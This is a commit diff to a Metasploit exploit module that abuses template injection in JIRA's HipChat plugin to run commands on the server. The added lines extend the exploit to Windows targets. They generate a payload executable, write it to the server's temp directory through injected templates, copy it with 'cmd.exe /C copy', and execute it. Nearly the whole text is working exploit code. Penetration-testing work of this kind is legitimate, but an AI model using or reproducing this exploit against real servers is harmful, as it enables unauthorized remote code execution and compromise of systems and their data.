Support Win/Linx/Java payloads for Win/Linux platforms

2015-12-03 14:02:32 -06:00 · 2015-12-03 14:02:32 -06:00 · f33e63c16f
parent 83824b2902
commit f33e63c16f
1 changed files with 41 additions and 9 deletions
--- a/modules/exploits/unix/webapp/jira_hipchat_template.rb
+++ b/modules/exploits/unix/webapp/jira_hipchat_template.rb
@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
  def do_explicit_check
    begin
      cookie = do_login
-      # I don't really care which command to execute, as long as it's a valid one.
+      # I don't really care which command to execute, as long as it's a valid one for both platforms.
      # If the command is valid, it should return {"message"=>"0"}.
      # If the command is not valid, it should return an empty hash.
      c = get_exec_code('whoami')
@ -382,7 +382,13 @@ class Metasploit3 < Msf::Exploit::Remote
  # @param new_fname [String] The new file
  # @return [String]
  def get_dup_file_code(fname, new_fname)
-    get_exec_code("cp #{fname} #{new_fname}")
+    if fname =~ /^\/[[:print:]]+/
+      cp_cmd = "cp #{fname} #{new_fname}"
+    else
+      cp_cmd = "cmd.exe /C copy #{fname} #{new_fname}"
+    end
+
+    get_exec_code(cp_cmd)
  end


@ -431,7 +437,13 @@ class Metasploit3 < Msf::Exploit::Remote


  def target_platform_compat?(target_platform)
-    target.platform.names.grep(/#{target_platform}|java/i).empty? ? false : true
+    target.platform.names.each do |n|
+      if /^java$/i === n || /#{n}/i === target_platform
+        return true
+      end
+    end
+
+    false
  end


@ -452,11 +464,7 @@ class Metasploit3 < Msf::Exploit::Remote
    c = get_temp_path_code
    res = inject_template(c, cookie)
    json = res.get_json_document
-    if json['message']
-      return json['message']
-    end
-
-    ''
+    json['message'] || ''
  end

  def get_java_home_path(cookie)
@ -496,6 +504,30 @@ class Metasploit3 < Msf::Exploit::Remote


  def exploit_as_windows(cookie)
+    tmp_path = get_tmp_path(cookie)
+
+    if tmp_path.blank?
+      fail_with(Failure::Unknown, 'Unable to get the temp path.')
+    end
+
+    exe           = generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform)
+    exe_fname     = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe")
+    exe_new_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe")
+    exe_fname.gsub!(/Program Files/, 'PROGRA~1')
+    exe_new_fname.gsub!(/Program Files/, 'PROGRA~1')
+    register_files_for_cleanup(exe_fname, exe_new_fname)
+
+    print_status("Attempting to write #{exe_fname}")
+    c = get_write_file_code(exe_fname, exe)
+    inject_template(c, cookie)
+
+    print_status("New file will be #{exe_new_fname}")
+    c = get_dup_file_code(exe_fname, exe_new_fname)
+    inject_template(c, cookie)
+
+    print_status("Executing #{exe_new_fname}")
+    c = get_exec_code(exe_new_fname)
+    inject_template(c, cookie)
  end


@ -542,7 +574,7 @@ class Metasploit3 < Msf::Exploit::Remote
    print_status("Target being detected as: #{target_platform}")

    unless target_platform_compat?(target_platform)
-      fail_with(Failure::BadConfig, 'Selected target does not match the target.')
+      fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.')
    end

    case target.name